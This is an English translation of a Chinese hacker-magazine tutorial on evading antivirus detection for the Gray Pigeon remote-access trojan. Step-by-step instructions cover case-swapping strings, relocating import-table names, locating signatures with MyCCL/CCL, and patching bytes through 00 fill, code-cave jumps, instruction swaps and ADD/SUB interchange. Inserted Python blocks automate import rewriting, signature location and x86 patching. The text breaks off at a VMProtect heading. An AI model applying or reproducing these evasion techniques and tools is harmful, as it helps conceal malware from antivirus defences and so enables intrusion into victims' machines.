Trojan AV Evasion (木马免杀) Guide


Author: A1Pass. Source: Evil Octal Information Security Team (www.eviloctal.com)

**Note: this article was published in Hacker X-Files (黑客X档案) issue 7. This version differs slightly from the printed one and was submitted by the author to the Evil Octal forum; please keep this notice when reprinting.**

Since viruses and antivirus software came into being, the war between them has never stopped. Multi-signature scanning, automatic unpacking, memory scanning, proactive defence and the like have all done their part for network security, and the hacker side has not been idle either: signature patching, double polymorphic packing, header tricks and other [免杀](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>) techniques (literally "free from being killed"; this article calls it AV evasion) appeared in answer. The ancients said "know the enemy and know yourself, and you will never be defeated", so today we look at evasion from the antivirus analyst's side of the table: if you do not want to be detected, you first have to know how detection is done. Readers who have not looked at this before should take the chance to catch up.

**1. How antivirus detection works**

When an analyst receives an intercepted or user-submitted sample, the first step is to analyse its behaviour, meaning everything the file does once it runs: which new files it drops, how it changes the registry, how it registers a service, which ports it opens, and so on. With the behaviour understood, the next step is usually to study the structure of the file itself and find something unique in it. That unique piece is defined as the signature (特征码).
Whether a signature is a good one depends on where it is taken from. If the analyst takes it from the code that changes a registry key, for example, it is not a strong choice: as long as the trojan changes that key, in 99% of cases the key name exists as a string in the file, so the position of that string is an easy place to define a signature. But evading such a signature is just as easy: find the string and change the case of a letter. A signature taken from the file header, on the other hand, is much harder to deal with.

There is also a second kind of signature, the memory signature (内存特征码): bytes taken from the trojan's image after it has been loaded into memory. It works the same way as a file signature, except that the scanner reads process memory instead of the file on disk.

Once the signature is defined it is handed to another department and enters the virus definition database; after the user updates, any file that matches it is killed without hesitation. In other words, antivirus software recognises the signature, not the file. So the analyst's work of finding signatures is nothing mysterious. This article only deals with how a virus file gets its signature; other steps such as repairing infected files are irrelevant here and are left to interested readers.

**2. AV evasion methods**

There are many evasion methods, but I have not seen a systematic description written for beginners, who have to pay "masters" for tutoring instead, so I volunteered to write one; please forgive its shortcomings. I group the methods into two categories, active and passive.

_A. Active evasion_

1. Modify string features: take the initiative and look for anything that could be used as a signature, including the registry keys the trojan modifies, the names and paths of the files it drops, the name of the process it injects into, and any strings that may appear in the running process. Find these strings and change them.
2. Modify the import table: find the imported function names (API names) in the file and move them.
3. Disrupt the file structure: use JMP instructions to break up the original layout of the file.
4. Modify the entry point: add 1 to the file's entry point.
5. Modify the PE header: move the PE header to an empty area of the file.

_B. Passive evasion_

1. Modify the signature: locate the signature with a tool and then patch the bytes it covers.
2. Use VMProtect: encrypt selected code segments with VMProtect.
3. Pack the file: protect the trojan with an uncommon packer.
Some readers will be puzzled at this point: PE, VMProtect, entry point, what do these mean? Don't worry, everything is explained below; by the time you finish this article you will be an evasion expert. Let's go!

**3. Practical exercises**

**1.) Modify string features**

Here we again think from the analyst's point of view about what they would do at each step, and then use reverse thinking to deal with it. Suppose we have a Gray Pigeon (灰鸽子) sample. First we want to know what it does, how it runs and how it protects itself. Doing this properly takes a lot of expertise, so for our readers we use a simpler method: run the trojan and read its help file.

Open RegSnap, click the [New snapshot] button (Figure 1), and in the dialog select [Generate snapshot for all items] (Figure 2). Save the snapshot. RegSnap is now prepared, and next we run the trojan. A reminder: when doing evasion work, get into the habit of keeping a backup copy of the trojan, so that a bad edit or a destructive test run does not cost you the original.
Once the trojan has run, make a second snapshot in the same way and save it, then press F5. In the "Compare snapshots" dialog choose the snapshot saved first as the "first snapshot" and the one saved just now as the "second snapshot"; the result appears almost immediately (Figure 3).

Some readers feel lost when faced with the information RegSnap collects and complain that there is too much of it. Two tips: keep the time between the two snapshots as short as possible, and exclude the OpenSaveMRU registry key and the read/write records for *.rsnp files, which RegSnap itself produces. Below are the useful records, which we go through one by one.

File list, C:\WINDOWS\*.*
  New file: 木马.exe
Registry report
  New key: HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\A1Pass-admin\desktop\huigezi\cover member Server02.exe
    Value: string "a covering member Server02"
  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_木马服务\0000\Class
    Value: string "LegacyDriver"
  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_木马服务\0000\ClassGUID
    Value: string "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_木马服务\0000\Control\ActiveService
    Value: string "木马服务" (Trojan service)
  HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\木马服务\Description
    Value: string "Gray Pigeon server program. Remote monitoring and management."
  ......

Here I have only excerpted the key records of the trojan's actions; for the full record see the disc.
From the file list we know that the trojan drops a new file in the WINDOWS directory, and from the registry records we know that it registers itself as a system service so that it runs automatically. Now back to the Rising research lab, to see what the big brothers and sisters there would do:

Rising big brother: "This Gray Pigeon has been far too rampant lately! Shouldn't we define a few more sets of signatures?"
Rising big sister: "Yes, good idea! Let's start by defining a signature on one of those registry strings."
A1Pass: "STOP!!" (The screen freezes and the A1Pass player is minimised.)

The dialogue tells us that they define registry strings as signatures, and the RegSnap records above show how many candidates they have to choose from. Which would they actually use? As far as a hacker is concerned, every string in the trojan that can be changed without affecting the server's normal operation should be changed. Changing all of them is of course impossible, unless you write your own trojan.

Some readers will ask whether anything besides the registry strings can be modified. Of course: the names and paths of the files it drops, the name of the process it injects into, and so on. For file and process names we can exploit the fact that Windows is not case-sensitive and simply swap upper-case and lower-case letters; strings that may appear in the running process can be replaced with other content outright. Below I show how to change the name of the injection target. First configure the server. Figure 4 shows that Gray Pigeon needs the process "IEXPLORE.EXE" in order to start, and by the same reasoning as for the registry we can assume that the unpacked server contains the string "IEXPLORE.EXE".
Time to bring out our first weapon, WinHex. WinHex is a very well-known hex editor, with the five-star top rating in the ZDNet Software Library and a powerful set of system utilities; here we only use it to edit files. Open the trojan file Server.exe in WinHex (Figure 5), press Ctrl+F to bring up the text search dialog, enter IEXPLORE.EXE and click OK (Figure 6). The result is shown in Figure 7. Now change the case: click the letter you want to change, for example I, and type i on the keyboard, exactly as you would in Windows Notepad. When you are done press Ctrl+S to save. Is it that simple? Yes, it is. The registry strings, the dropped file name and path and so on can all be changed in the same way.

Unfortunately, changes like these are still not enough to get past the scanners of Kingsoft, Jiangmin and other brands, so the trojan needs further treatment. Next we learn evasion for the import table functions (API names).

**2.) Modify the import table**

Not everyone knows that a PE file cannot run without the functions in its import table, and that the names of those functions and their position in the file differ from program to program, which makes import table functions another favourite place for analysts to take signatures. Before I found out which signatures were being used for Gray Pigeon, the "Rising big brother" had already taken one of the imported functions as a signature.
So import table evasion is an essential trick for newcomers to master. [PE tip: PE is the executable file format of Windows. It consists of the PE headers, the import table, resources and so on.]

In my tests, directly editing an imported function name inside the file makes the program misbehave or even crash. Is there no way out? I was not going to give up so easily. After a bitter struggle I finally found a solution in LordPE, and FoBnN's article gave me a lot of inspiration.

Open LordPE, click [PE Editor], select the trojan file, then click [Directories] (Figure 8) and the [...] button next to the import table (Figure 9). In the dialog choose InternetOpenUrlA under wininet.dll (Figure 10). Why that function? Because it is where the signature is (how to determine that is explained later; don't worry about it yet).

Leave LordPE for a moment and use WinHex to find the InternetOpenUrlA string in the file and overwrite it with zeros (click in the hex pane on the right of WinHex and type 0; Figures 11 and 12). Then write the name into a blank area, i.e. a region that displays as 00 00 00 ..., starting exactly at the beginning of the blank area so that the address is easy to calculate later, and take care to keep the case of the function name exactly as it was (Figure 13).
After saving, go back to LordPE, right-click the InternetOpenUrlA entry, choose "Edit" and set the Thunk field to 000B9D5E (Figure 14). Some readers will ask: we wrote the name at 000B9D60, so why 000B9D5E? The reason is that every imported name is preceded by a 2-byte field (the original calls it an "empty space"; it is the Hint member of IMAGE_IMPORT_BY_NAME, and the thunk has to point at it), so the address to enter is the address of the name minus 2: 000B9D60 - 2 = 000B9D5E. Look at Figure 13 again if this is unclear. Note also that the thunk holds a relative virtual address (RVA), not a file offset; the two coincide only when the section's raw file offset equals its virtual address, so convert if they differ.

Back in LordPE, check what the edited entry looks like now (Figure 15). If it does not show our name, simply retype the function name in place (Figure 16). Sometimes the address we entered is too close to the end of the blank area, for example only two bytes fit after 000B9D5E; in that case temporarily set the Thunk to the start address 000B9D60, change the function name, then set the Thunk back to the original value 000B9D5E and save. Test the result (Figure 17): all of the pigeon's functions still work, and a scan with Rising (Figure 18) gives the obvious result.
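To make the LordPE step concrete, here is an added example (my own code for this edit, not A1Pass's tool and not part of LordPE or WinHex) that walks a PE32 import table and performs the same relocation: it copies the Hint and name of InternetOpenUrlA into a blank area, repoints every thunk to the new RVA minus 2, and blanks the old string. The PE image is constructed in memory so the script runs offline; the layout constants, the single `.idata` section and the function names (`imports`, `relocate_import_name`, `offset_to_va`) are assumptions of the example. It also includes the file-offset-to-virtual-address conversion that the later sections do with the Offset Converter tool.

```python
"""Walk and patch a PE32 import table (added example; not A1Pass's tool, LordPE or WinHex)."""
import struct

IMAGE_BASE, SECT_RVA, SECT_OFF, SECT_SIZE = 0x400000, 0x1000, 0x200, 0x200


def build_sample_pe():
    """Constructed PE32 with one section that imports wininet.dll!InternetOpenUrlA."""
    sec = bytearray(SECT_SIZE)
    # IMAGE_IMPORT_DESCRIPTOR: OriginalFirstThunk, TimeDateStamp, ForwarderChain, Name, FirstThunk
    struct.pack_into("<IIIII", sec, 0x00, SECT_RVA + 0x40, 0, 0, SECT_RVA + 0x60, SECT_RVA + 0x50)
    struct.pack_into("<II", sec, 0x40, SECT_RVA + 0x80, 0)   # INT: one thunk, then terminator
    struct.pack_into("<II", sec, 0x50, SECT_RVA + 0x80, 0)   # IAT: identical before loading
    sec[0x60:0x6C] = b"wininet.dll\0"
    struct.pack_into("<H", sec, 0x80, 0x0123)                # IMAGE_IMPORT_BY_NAME.Hint
    sec[0x82:0x93] = b"InternetOpenUrlA\0"                   # IMAGE_IMPORT_BY_NAME.Name
    hdr = bytearray(SECT_OFF)
    hdr[0:2], hdr[0x40:0x44] = b"MZ", b"PE\0\0"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                  # e_lfanew
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, stamp, symtab, nsyms, SizeOfOptionalHeader, flags
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt = 0x58                                               # IMAGE_OPTIONAL_HEADER32 starts here
    struct.pack_into("<H", hdr, opt, 0x10B)                  # PE32 magic
    struct.pack_into("<I", hdr, opt + 16, SECT_RVA + 0x100)  # AddressOfEntryPoint
    struct.pack_into("<III", hdr, opt + 28, IMAGE_BASE, 0x1000, 0x200)  # ImageBase, alignments
    struct.pack_into("<I", hdr, opt + 92, 16)                # NumberOfRvaAndSizes
    struct.pack_into("<II", hdr, opt + 104, SECT_RVA, 40)    # DataDirectory[1] = import table
    struct.pack_into("<8sIIII", hdr, opt + 0xE0, b".idata", SECT_SIZE, SECT_RVA, SECT_SIZE, SECT_OFF)
    return bytes(hdr) + bytes(sec)

def _nt(pe):
    off = struct.unpack_from("<I", pe, 0x3C)[0]              # e_lfanew -> "PE\0\0"
    if pe[off:off + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    return off

def sections(pe):
    """[(name, VirtualAddress, size, PointerToRawData)] from the section table."""
    nt = _nt(pe)
    nsec, opt_size = struct.unpack_from("<H", pe, nt + 6)[0], struct.unpack_from("<H", pe, nt + 20)[0]
    out = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, nt + 24 + opt_size + 40 * i)
        out.append((name.rstrip(b"\0").decode(), va, max(vsize, rawsize), rawptr))
    return out

def rva_to_offset(pe, rva):
    for _, va, size, raw in sections(pe):
        if va <= rva < va + size:
            return rva - va + raw
    raise ValueError(f"RVA {rva:#x} is not backed by any section")

def offset_to_rva(pe, off):
    for _, va, size, raw in sections(pe):
        if raw <= off < raw + size:
            return off - raw + va
    raise ValueError(f"file offset {off:#x} is not inside any section")

def offset_to_va(pe, off):
    """The 'offset converter' step of the text: file offset -> address OllyDbg shows."""
    return struct.unpack_from("<I", pe, _nt(pe) + 24 + 28)[0] + offset_to_rva(pe, off)

def _thunks(pe):
    """Yield (dll, name, name_off, thunk_off) for every by-name thunk in the INT and the IAT."""
    desc = rva_to_offset(pe, struct.unpack_from("<I", pe, _nt(pe) + 24 + 104)[0])
    while True:
        oft, _, _, name_rva, ft = struct.unpack_from("<IIIII", pe, desc)
        if name_rva == 0:                                    # all-zero descriptor ends the list
            return
        dll_off = rva_to_offset(pe, name_rva)
        dll = pe[dll_off:pe.index(b"\0", dll_off)].decode()
        for arr in (oft, ft):
            thunk = rva_to_offset(pe, arr) if arr else None
            while thunk is not None and struct.unpack_from("<I", pe, thunk)[0]:
                entry = struct.unpack_from("<I", pe, thunk)[0]
                if not entry & 0x80000000:                   # ordinal imports carry no name
                    name_off = rva_to_offset(pe, entry) + 2  # skip the WORD Hint
                    yield dll, pe[name_off:pe.index(b"\0", name_off)].decode(), name_off, thunk
                thunk += 4
        desc += 20

def imports(pe):
    """(dll, function, file offset of the name string): the view LordPE gives you."""
    return sorted({(d, n, o) for d, n, o, _ in _thunks(pe)})

def relocate_import_name(pe, func, blank_off):
    """The LordPE edit of the text: copy Hint+Name of `func` to a blank area, point every thunk
    at it and blank the old copy. A thunk is the RVA of IMAGE_IMPORT_BY_NAME, whose 2-byte Hint
    precedes the string, so it becomes rva(blank_off) - 2 (the 'one space' of the text)."""
    pe = bytearray(pe)
    refs = [(t, o) for _, n, o, t in _thunks(pe) if n == func]
    if not refs:
        raise KeyError(func)
    old_off = refs[0][1]
    pe[blank_off - 2:blank_off] = pe[old_off - 2:old_off]
    pe[blank_off:blank_off + len(func) + 1] = func.encode() + b"\0"
    for thunk_off, _ in refs:
        struct.pack_into("<I", pe, thunk_off, offset_to_rva(pe, blank_off) - 2)
    pe[old_off:old_off + len(func)] = bytes(len(func))       # the bytes a signature keyed on
    return bytes(pe)
```

Running `imports(build_sample_pe())` lists the one import at file offset 0x282; after `relocate_import_name(pe, "InternetOpenUrlA", 0x380)` the same name is reported at 0x380 and both thunk arrays hold the RVA 0x117E, i.e. the new name's RVA minus 2. Both the INT (OriginalFirstThunk) and the IAT (FirstThunk) are patched, because the loader follows the INT when it is present and the IAT otherwise.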
**3.) Modify the signature**

Although evasion has already succeeded at this point, to learn more of the craft and to make our pigeon survive longer, I next introduce how to locate and modify signatures. The signature is the heart of antivirus software, and our heart too: whoever finds the other side's vital spot first and lands the fatal blow wins.

Signature location brings us to MyCCL and CCL. Anyone who has looked into evasion knows the names, but because the tools look foolproof their descriptions are usually cursory, which makes them hard for beginners. Here I first explain MyCCL.

Figure 19 shows MyCCL; the numbers below refer to the numbered areas in that figure. First click 1 to select the file, then in 2 enter the block count. More blocks means more precise location, but slower generation and a larger total output: with a server as large as Gray Pigeon's, 300 blocks produce more than 230 MB of files. So do not enter too large a number; for a server the size of Gray Pigeon's about 40 blocks is enough.
When generation finishes, a dialog tells you to go to the output directory and scan it, for example "E:\文章\极度免杀\Pigeon\OUTPUT". Run the antivirus on that folder and let it delete every file it detects; this step is important. Then click 3, "secondary processing", and click [Features section] above the [Generate] button; a dialog appears on the right. In its "interval setting" list right-click the signature range and choose "composite precise positioning here" (Figure 20), then repeat the whole procedure until the [unit length] is small enough to change easily; the signature is then located. That was a lot in one breath; I hope beginners now have some idea of how MyCCL is used.

What we have located so far is the file signature; the memory signature is still undefined, and for that we use CCL's memory signature location function. Open CCL and choose [File] → [Signature test] → [Memory signature] (Figure 21). In the dialog select the trojan to be processed; the "positioning range selection window" appears (Figure 22). The figure shows that the first CODE section starts at file offset 00000400, so we use 00000400 as the start position and enter it in the "start position" field of the user input area. How do we fill in the test size? Look at Figure 22 again, at the line "current file size".
Use the Windows calculator in scientific mode, set to hexadecimal and dword (Figure 23), and subtract the start value 00000400 from the current file size; the result is 000B9A00. Enter 000B9A00 as the "test size" and click the "Add section" button (Figure 24). Finally click OK, and in the new dialog click Run. During this operation the antivirus software must be running with all of its features enabled. Then all you have to do is wait.

Finding the signature is not enough; we also have to learn how to change it, and there is a lot to know about that. For the convenience of readers who want to apply what they learn, this part stays light on theory and concentrates on practical operations. But note: an evasion method has a lifetime, just like the trojan it is applied to, and after that time it stops working or its effect is greatly reduced. To really become an evasion expert you need solid fundamentals so that you can keep creating new methods, because this is a battle of wits with the antivirus vendors' professionals. With that said, let us look at the ways currently used to change a signature.
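The block-by-block location loop that MyCCL and CCL automate, followed by the two simplest patches (case swap and 00 fill, described in the next subsections), as an added example (my code for this edit, not MyCCL, CCL or anything by A1Pass). The antivirus is replaced by a constructed scanner with two independent exact-byte signatures, the "server" is a constructed 2 KiB buffer, and nothing is written to disk. Besides the drop-one-block test that MyCCL performs, it adds a keep-one-block test for the case where a second independent signature keeps every variant detected, which is where single-block location silently fails. The function names and the sample are the example's own.

```python
"""Locate the bytes a signature scanner keys on, then patch them.
Added example; not MyCCL, CCL or A1Pass's code. The antivirus is replaced by a constructed
scanner with exact-byte signatures, and the 'server' is a constructed buffer."""

# Stand-in for the AV: two independent signatures, one on the injected process name
# and one on a code fragment; a file is flagged if either matches.
SIGNATURES = [b"IEXPLORE.EXE", bytes.fromhex("8BEC81C100000010")]


def toy_scanner(buf):
    return any(sig in buf for sig in SIGNATURES)


def build_sample():
    """Constructed 2 KiB 'server' with the two signatures planted at 0x123 and 0x6A0."""
    data = bytearray(bytes(range(256)) * 8)
    data[0x123:0x12F] = SIGNATURES[0]
    data[0x6A0:0x6A8] = SIGNATURES[1]
    return bytes(data)


def filled(data, lo, hi, fill=0x00):
    """Variant with [lo, hi) overwritten: one such file per block is what MyCCL writes to OUTPUT."""
    return data[:lo] + bytes([fill]) * (hi - lo) + data[hi:]


def kept_only(data, lo, hi, fill=0x00):
    """Variant with everything outside [lo, hi) overwritten (this breaks the PE layout, so
    against a real engine it only works if the engine still scans such files)."""
    return bytes([fill]) * lo + data[lo:hi] + bytes([fill]) * (len(data) - hi)


def locate_one(data, detected, lo, hi, blocks=8, min_len=4):
    """Narrow [lo, hi) to a region the scanner depends on.
    'drop' mode: blank one block; if detection stops, the block holds signature bytes.
    'keep' mode, used when no single block is decisive because another independent
    signature keeps every variant detected: keep one block and blank the rest; if the
    file is still detected, that block alone carries a complete signature."""
    mode = None
    while hi - lo > min_len:
        size = -(-(hi - lo) // blocks)                     # ceil division
        edges = list(range(lo, hi, size)) + [hi]
        pairs = list(zip(edges, edges[1:]))
        found = None
        if mode != "keep":
            found = next((p for p in pairs if not detected(filled(data, *p))), None)
            mode = "drop" if found else mode
        if found is None and mode != "drop":
            found = next((p for p in pairs if detected(kept_only(data, *p))), None)
            mode = "keep" if found else mode
        if found is None:
            break                                          # cannot narrow further at this granularity
        lo, hi = found
    return (lo, hi) if mode else None


def locate_all(data, detected, **kw):
    """The 'find one, blank it, scan again' loop of the text, until the scanner is quiet."""
    work, regions = bytes(data), []
    while detected(work):
        region = locate_one(work, detected, 0, len(work), **kw)
        if region is None:
            raise RuntimeError("no block is decisive; try another fill byte or more blocks")
        regions.append(region)
        work = filled(work, *region)
    return regions


def patch_region(data, lo, hi):
    """Choose the patch the text recommends: swap letter case when the region is readable
    text (Windows file and process names are case-insensitive, the signature is not),
    otherwise fill it with 00."""
    chunk = data[lo:hi]
    readable = all(0x20 <= c < 0x7F for c in chunk) and any(chr(c).isalpha() for c in chunk)
    return data[:lo] + chunk.swapcase() + data[hi:] if readable else filled(data, lo, hi)


def demo():
    sample = build_sample()
    regions = locate_all(sample, toy_scanner)
    patched = sample
    for lo, hi in regions:
        patched = patch_region(patched, lo, hi)
    return regions, patched
```

`demo()` first finds the 32-byte window holding IEXPLORE.EXE (only the keep-one test can isolate it while the code signature is still present), blanks it, and then narrows the code signature down to its first four bytes with the ordinary drop-one test. The text string is patched by swapping case, the code bytes by 00 fill, and the scanner is quiet afterwards. With a real engine the `detected` callback would write each variant to disk and check whether the scanner removes it, which is exactly the OUTPUT-folder step above; a signature made entirely of 00 bytes is invisible to zero fill, which is why `fill` is a parameter.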
_1. Case replacement (file signatures only)_

Suitable for: signatures that contain recognisable English letters or words which are determined not to be function-related, such as import table function names.

Method: as in the first section of the practical exercises, simply swap the case; if the signature contains an A, replace it with an a.

Principle: Windows is not case-sensitive here, but the antivirus signature is, and that is enough to evade it.

_2. 00 fill_

Suitable for: almost any situation, but the success rate is not very high.

Method: suppose we have located the signature 0009EE7F_00000005. This tells us that the position is 0009EE7F and the size is 5 bytes, i.e. the range 0009EE7F-0009EE83 (Figure 25). Readers following along will ask: how did you find that address, and why can't I? Because WinHex displays offsets in decimal by default; click the Offset column header to switch it to hexadecimal (Figure 26). Then select the range and fill it with 00 (Figure 27). Try a few places; in about 80% of cases you will find one that evades detection without affecting normal operation. For a memory signature, first convert the memory address into a hexadecimal file offset with the small Offset Converter (偏移量转换器) tool, then do the same.
Principle: because of the PE format, the compiler and other factors, generated object code is not very efficient and inevitably contains some "junk" bytes whose presence or absence does not decide whether the program runs. When the analyst defines such junk as the signature we can simply remove it, and the way to remove it is to overwrite it with meaningless 00 bytes.

_3. Jump to a blank area_

Suitable for: almost any situation; the success rate is relatively high.

Method: take the signature 0009EE7F_00000005 again. If the 00 fill fails, do not think twice; go straight to OllyDbg. I will not introduce OllyDbg, a very good and very professional live disassembler and debugger; here it only helps with our evasion work. The first thing to do is convert the hexadecimal file offset 0009EE7F into a memory address, because OllyDbg works on the program as it is laid out in memory. This is where the Offset Converter (偏移量转换器) comes in; for our file it gives 0049FA7F (Figure 28). Load the trojan server in OllyDbg, first find a blank area and note its address, 004A24A5, then go to the converted address 0049FA7F. Select the three instructions starting at 0049FA7F, right-click and choose [Copy] → [To clipboard] (Figure 29), paste them into a text document as a backup, then NOP the three instructions out one by one (Figure 30). Finally right-click at 0049FA7F, choose Assemble, and enter the instruction "jmp 004A24A5" (Figure 31).
Remember to untick "Fill with NOPs" before clicking [Assemble]. Note the address immediately below the assembled instruction, 0049FA84 (look carefully at Figure 31). Now go to the blank area at 004A24A5 (Figure 32) and assemble the backed-up instructions from the text document one by one in the same way; on the line after the last one, at 004A24AA, add "jmp 0049FA84" (Figure 33). Then right-click → [Copy to executable] → [All modifications] (Figure 34), choose "Copy all" in the dialog and save. For a memory signature the address conversion step is not needed.

Principle: look at Figure 35. As the name "jump to a blank area" says, the code containing the signature is moved to the blank area; its original location is NOPed out and a jump instruction placed there, which jumps to 004A24A5, the blank area we found, where the code originally at 0049FA7F now lives; after that code comes a jump back to 0049FA84, so that the program continues as before.

_4. Swap adjacent instructions_

Suitable for: almost any situation; the success rate is relatively high.
Method: load the trojan in OllyDbg. Assume again the signature 0009EE7F_00000005; as above, the Offset Converter gives the memory address 0049FA7F. Find that location in OllyDbg and, using the same assembling technique as in "Jump to a blank area", exchange the positions of the instruction at 0049FA7F and the instruction above or below it. For a memory signature the address conversion step is not needed.

Principle: the antivirus locates a signature strictly by offset or memory address, while the order of machine instructions in a program is in general not fixed, so swapping two of them leaves the program working and the scanner none the wiser. Only swap instructions that do not depend on each other, and check in the debugger that the program still runs.

_5. ADD and SUB interchange_

Suitable for: memory signatures that fall on an ADD or SUB instruction; the success rate is relatively high.

Method: load the trojan in OllyDbg and assume the signature's address falls on an ADD or SUB, for example:

00018A88  XXXXX 00000088  ADD ECX,10000000

Replace the machine code of ADD ECX,10000000 with that of SUB ECX,F0000000, and after the change save the result as an EXE file.

Principle: we all know that 1+1=2, and we also know that 1-(-1)=2. ADD adds and SUB subtracts; swapping one for the other with the negated operand gives the same result, but the antivirus no longer recognises the bytes. One caveat the method needs: ADD and SUB set the carry and auxiliary-carry flags differently, so only do this where the following code does not depend on those flags.

That concludes signature lookup and modification. Is that all there is? Far from it.
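The two instruction-level patches above, "jump to a blank area" and the ADD/SUB interchange, as an added example working on raw bytes (my code for this edit, not A1Pass's and not a feature of OllyDbg). It assumes a code section mapped at the addresses the text uses (signature at 0049FA7F, blank area at 004A24A5), uses the prologue bytes from the listing in the next section as the instructions to move, and the instruction stream is constructed; the function names are the example's own. The moved length is a parameter, so it generalises the three-instruction case in the text, and the ADD/SUB swap also covers the 83 (imm8) and 05/2D (eax) encodings.

```python
"""In-place x86 patches from the text, 'jump to a blank area' and ADD/SUB interchange.
Added example; not A1Pass's code and not an OllyDbg feature. It works on the raw bytes of
a code section plus the virtual address that section is mapped at."""
import struct

NOP = 0x90


def jmp_rel32(src_va, dst_va):
    """E9 rel32: the displacement counts from the end of the 5-byte instruction."""
    return b"\xE9" + struct.pack("<i", dst_va - (src_va + 5))


def jump_to_cave(code, code_va, sig_off, moved_len, cave_off):
    """Move `moved_len` bytes of instructions at sig_off into the cave at cave_off, leave a
    jmp to the cave (NOP-padded) in their place and jump back after them.
    The caller must check in the disassembler that moved_len covers whole instructions,
    that none of them is a relative jmp/call or a branch target, and that the cave is
    unused space in an executable section (the 00 00 'add [eax],al' run of the text)."""
    if moved_len < 5:
        raise ValueError("need at least 5 bytes to overwrite with a jmp rel32")
    if code[cave_off:cave_off + moved_len + 5].strip(b"\0"):
        raise ValueError("cave is not blank")
    patched = bytearray(code)
    moved = bytes(code[sig_off:sig_off + moved_len])
    patched[sig_off:sig_off + moved_len] = (jmp_rel32(code_va + sig_off, code_va + cave_off)
                                            + bytes([NOP]) * (moved_len - 5))
    patched[cave_off:cave_off + moved_len] = moved
    back_from, back_to = code_va + cave_off + moved_len, code_va + sig_off + moved_len
    patched[cave_off + moved_len:cave_off + moved_len + 5] = jmp_rel32(back_from, back_to)
    return bytes(patched)


def swap_add_sub(insn):
    """ADD r/m32, imm  <->  SUB r/m32, -imm: same register result, different bytes, same length.
    Handles 05/2D (eax, imm32), 81 /0 and /5 (imm32) and 83 /0 and /5 (imm8) with a register
    operand. Caveat the text leaves out: ADD and SUB set CF and AF differently, so only do
    this where the following instructions do not consume those flags."""
    op = insn[0]
    if op in (0x05, 0x2D) and len(insn) == 5:
        imm = struct.unpack("<I", insn[1:5])[0]
        return bytes([0x2D if op == 0x05 else 0x05]) + struct.pack("<I", -imm & 0xFFFFFFFF)
    if op in (0x81, 0x83) and len(insn) == (6 if op == 0x81 else 3):
        modrm = insn[1]
        if modrm >> 6 != 3 or (modrm >> 3) & 7 not in (0, 5):
            raise ValueError("only register-operand ADD/SUB forms are handled")
        modrm ^= 0x28                            # flip the reg field: /0 (000) <-> /5 (101)
        if op == 0x81:
            imm = struct.unpack("<I", insn[2:6])[0]
            return bytes([0x81, modrm]) + struct.pack("<I", -imm & 0xFFFFFFFF)
        imm = struct.unpack("<b", insn[2:3])[0]
        if imm == -128:                          # 128 does not fit imm8; would need the 81 form
            raise ValueError("imm8 of -128 cannot be negated in place")
        return bytes([0x83, modrm]) + struct.pack("<b", -imm)
    raise ValueError(f"not an ADD/SUB imm instruction: {insn.hex()}")


# Constructed code section mapped at the addresses the text uses: signature at 0049FA7F,
# blank area at 004A24A5. The first eight bytes are the prologue from the listing in the
# next section, followed by the ADD ECX,10000000 of the ADD/SUB example.
CODE_VA = 0x0049FA7F
CAVE_OFF = 0x004A24A5 - CODE_VA
PROLOGUE = bytes.fromhex("55 8BEC B904000000")            # push ebp; mov ebp,esp; mov ecx,4
ADD_ECX = bytes.fromhex("81C100000010")                   # add ecx,10000000h
SAMPLE = PROLOGUE + ADD_ECX + bytes(CAVE_OFF + 0x40 - len(PROLOGUE) - len(ADD_ECX))


def demo():
    """Relocate the prologue into the cave and rewrite the ADD in place."""
    patched = jump_to_cave(SAMPLE, CODE_VA, 0, len(PROLOGUE), CAVE_OFF)
    return patched[:8] + swap_add_sub(patched[8:14]) + patched[14:]
```

`demo()` leaves `E9 21 2A 00 00 90 90 90` at 0049FA7F (a jump to 004A24A5 followed by three NOPs), the original eight prologue bytes at 004A24A5, and `E9 D5 D5 FF FF` after them, which jumps back to 0049FA87, the first instruction that was not moved; the ADD becomes `81 E9 00 00 00 F0`, i.e. SUB ECX,F0000000. Note that `jump_to_cave` only verifies that the cave is zero bytes; whether those bytes are inside an executable section is something you confirm in OllyDbg's memory map before copying the change to the executable.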
Below we look at the other evasion methods.

**4.) Other evasion methods**

_Change the file header:_

Changing the file header here means adding a new head in front of the old one and adding junk code at the start of the file. For the new head we again use OllyDbg. Load the file; OllyDbg stops at the entry point automatically (Figure 36). Copy and save the first three instructions, find a blank area and assemble them there one by one (Figure 37), then add a JMP that jumps back to the fourth instruction of the original entry point. Anyone who has read the article carefully understands the principle; if not, review the third signature modification method above, which works the same way. After the change it looks like this:

004A2A73    0000            add byte ptr ds:[eax],al
004A2A75    0000            add byte ptr ds:[eax],al
004A2A77    55              push ebp
004A2A78    8BEC            mov ebp,esp
004A2A7A    B9 04000000     mov ecx,4
004A2A7F  ^ E9 CCF3FFFF     jmp Server.004A1E50
004A2A84    0000            add byte ptr ds:[eax],al
004A2A86    0000            add byte ptr ds:[eax],al
004A2A88    0000            add byte ptr ds:[eax],al

The add byte ptr ds:[eax],al lines are the so-called blank area. The new file head is at 004A2A77, so we must also change the entry point with PEditor: load the file, set the entry point to our new head address 004A2A77 (Figure 38) and save.

_Entry point plus 1:_

Load the file in PEditor and add 1 to the original entry point; for example our entry point 004A2A77 becomes 004A2A78 (Figure 39), then click "Apply Changes". This skips the first byte of the original prologue (the push ebp above), so test that the server still runs afterwards.
This simple method on its own can deal with most antivirus software.

_VMProtect encryption:_

